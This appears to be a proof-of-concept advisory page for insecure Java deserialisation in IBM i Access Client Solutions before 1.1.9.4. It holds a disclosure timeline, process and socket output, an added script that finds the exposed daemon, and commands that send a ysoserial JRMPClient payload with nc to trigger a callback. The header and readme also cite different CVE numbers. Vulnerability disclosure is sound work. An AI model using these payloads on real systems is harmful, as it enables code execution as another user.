
CVE-2023-45185 PoC — IBM i code issue vulnerability

Associated Vulnerability
Title: IBM i code issue vulnerability (CVE-2023-45185)
Description: IBM i is an operating system from IBM (International Business Machines, USA) that runs on IBM Power Systems and IBM PureSystems. IBM i Access Client Solutions versions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 contain a code issue vulnerability caused by improper authority checks, which could allow an attacker to execute code remotely.
Description
IBM i Access Client Solutions < 1.1.9.4 - Remote code execution via insecure deserialisation
Readme
# CVE-2023-45184
IBM i Access Client Solutions < 1.1.9.4 - Remote code execution via insecure deserialisation.

## Timeline
- Vulnerability reported to vendor: 22.09.2023
- New fixed 1.1.9.4 version released: 08.12.2023
- Public disclosure: 15.12.2023

## Description

IBM i Access Client Solutions uses insecure Java deserialisation for password storage and for obtaining the decryption key used to encrypt stored passwords. A local or remote attacker can use this to execute code as the user running the client. The deserialisation happens in a helper process (the "ACS Daemon") that listens on a TCP port, so any account that can reach that port can trigger it.

The local server is easy to find with the `netstat` command; note that it is bound to `:::`, i.e. to all addresses rather than to loopback only:
```
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ netstat -nltp | grep java
tcp6       0      0 :::34307                :::*                    LISTEN      3225094/java         off (0.00/0/0)
```

The `ps` command confirms what that listener is: the ACS Daemon (main class `com.ibm.iaccess.base.LmHybridServerImpl`), running as the user `mmajchrowicz` (shown truncated as `mmajchr+`) next to the main `acsbundle` process:
```
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ ps aux | grep java
mmajchr+ 3224938  6.8  0.9 13305316 301392 pts/6 Sl+  12:30   0:17 java -jar ./acsbundle_1.9.new.jar
mmajchr+ 3225094  0.3  0.2 11512420 79692 pts/6  Sl+  12:30   0:00 /usr/lib/jvm/java-17-openjdk-amd64/bin/java -Djava.class.path=/tmp/ACS.lm13910263510749358977.jar -Dvisualvm.display.name=ACS Daemon -Dcom.ibm.tools.attach.displayName=ACS Daemon com.ibm.iaccess.base.LmHybridServerImpl
mkubiak  3238934  0.0  0.0   6464  1992 pts/12   R+   12:44   0:00 grep --color=auto java
```
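The two commands above can be turned into a repeatable check. The following is an added example, not code from the PoC author or from IBM: it parses `ps aux` and `netstat -nltp` output, joins the two views by PID, and reports every listening socket owned by an ACS Daemon process together with the owning user and whether the socket is bound to all interfaces. The sample text embedded in the script is the output shown in the session above, so the functions can be exercised offline; the script name `acs_daemon_check.py` is only an assumption for the usage comments.

```python
"""Locate the ACS Daemon listener on a Linux host (added example, not part of the PoC)."""
import re
import subprocess

# Main class of the helper process seen in the ps output above.
ACS_DAEMON_CLASS = "com.ibm.iaccess.base.LmHybridServerImpl"

# Output copied from the session above, embedded so the functions can be exercised offline.
SAMPLE_PS = """\
mmajchr+ 3224938  6.8  0.9 13305316 301392 pts/6 Sl+  12:30   0:17 java -jar ./acsbundle_1.9.new.jar
mmajchr+ 3225094  0.3  0.2 11512420 79692 pts/6  Sl+  12:30   0:00 /usr/lib/jvm/java-17-openjdk-amd64/bin/java -Djava.class.path=/tmp/ACS.lm13910263510749358977.jar -Dvisualvm.display.name=ACS Daemon -Dcom.ibm.tools.attach.displayName=ACS Daemon com.ibm.iaccess.base.LmHybridServerImpl
mkubiak  3238934  0.0  0.0   6464  1992 pts/12   R+   12:44   0:00 grep --color=auto java
"""
SAMPLE_NETSTAT = """\
tcp6       0      0 :::34307                :::*                    LISTEN      3225094/java         off (0.00/0/0)
"""

# netstat -nltp: Proto Recv-Q Send-Q Local-Address Foreign-Address State PID/Program
LISTEN_RE = re.compile(r"^(tcp6?)\s+\d+\s+\d+\s+(\S+)\s+\S+\s+LISTEN\s+(\d+)/(\S+)")


def acs_daemon_processes(ps_output: str) -> dict:
    """Map PID -> owning user for every process whose command line runs the ACS Daemon class."""
    owners = {}
    for line in ps_output.splitlines():
        if ACS_DAEMON_CLASS not in line:
            continue
        fields = line.split(None, 10)  # ps aux: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
        if len(fields) == 11 and fields[1].isdigit():
            owners[int(fields[1])] = fields[0]  # ps truncates long user names ("mmajchr+")
    return owners


def listening_sockets(netstat_output: str) -> dict:
    """Map PID -> list of (proto, local_address, port) for LISTEN sockets in `netstat -nltp` output."""
    sockets = {}
    for line in netstat_output.splitlines():
        m = LISTEN_RE.match(line)
        if not m:
            continue  # header lines, or sockets whose PID is hidden ("-") because we may not inspect them
        proto, local, pid, _prog = m.groups()
        addr, port = local.rsplit(":", 1)
        sockets.setdefault(int(pid), []).append((proto, addr, int(port)))
    return sockets


def find_acs_daemon(ps_output: str, netstat_output: str) -> list:
    """Join the two views: one record per listening socket owned by an ACS Daemon process."""
    owners = acs_daemon_processes(ps_output)
    found = []
    for pid, socks in listening_sockets(netstat_output).items():
        if pid not in owners:
            continue
        for proto, addr, port in socks:
            found.append({
                "pid": pid,
                "user": owners[pid],
                "proto": proto,
                "port": port,
                # "::" or "0.0.0.0" means the daemon is reachable from other hosts, not only locally
                "all_interfaces": addr in ("::", "0.0.0.0"),
            })
    return found


def find_acs_daemon_live() -> list:
    """Run the same check against the running system."""
    ps = subprocess.run(["ps", "aux"], capture_output=True, text=True, check=True).stdout
    ns = subprocess.run(["netstat", "-nltp"], capture_output=True, text=True).stdout
    return find_acs_daemon(ps, ns)


if __name__ == "__main__":
    # python3 acs_daemon_check.py
    for record in find_acs_daemon_live():
        print(record)
```

Two caveats when running this live: `netstat -p` only prints the PID for sockets whose process you are allowed to inspect (your own, or all of them as root), so a socket shown as `-` is not matched and the check should be run as root to be conclusive; and on hosts where `netstat` is no longer installed, `ss -lntp` gives the same information in a different layout and needs its own regex.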

Code execution as the user `mmajchrowicz` can be achieved from a different account, `mkubiak`, by generating a `ysoserial` JRMPClient payload that points back to a port we control and sending it raw to the daemon's port:
```
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ id
uid=1012(mkubiak) gid=1012(mkubiak) groups=1012(mkubiak),27(sudo)

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java -jar ysoserial.jar JRMPClient '127.0.0.1:9191' > jrmp.bin

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ (sleep 3; cat jrmp.bin) | nc -6 ::1 34307

```

In a second terminal the listener on port 9191 receives a connection once the daemon has deserialised the payload. The `JRMIK` bytes are the start of a Java RMI (JRMP) handshake, i.e. the daemon's JVM has deserialised the RMI reference inside the payload and is connecting back to it:
```
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ nc -lvnp 9191
listening on [any] 9191 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 38012
JRMIK

┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$
```

The root cause is insecure deserialisation of data received over the network and of stored user data. The issue is fixed in IBM i Access Client Solutions 1.1.9.4.

## Affected versions
< 1.1.9.4

## Advisory
Update IBM i Access Client Solutions to 1.1.9.4 or newer.

### References
* https://www.ibm.com/support/pages/node/7091942
* https://nvd.nist.gov/vuln/detail/CVE-2023-45185
File Snapshot
```
/data/pocs/ac1c412ee53976dad6a25ec413e40b55d71a849c
├── LICENSE   (34K)
└── README.md (2.5K)
0 directories, 2 files
```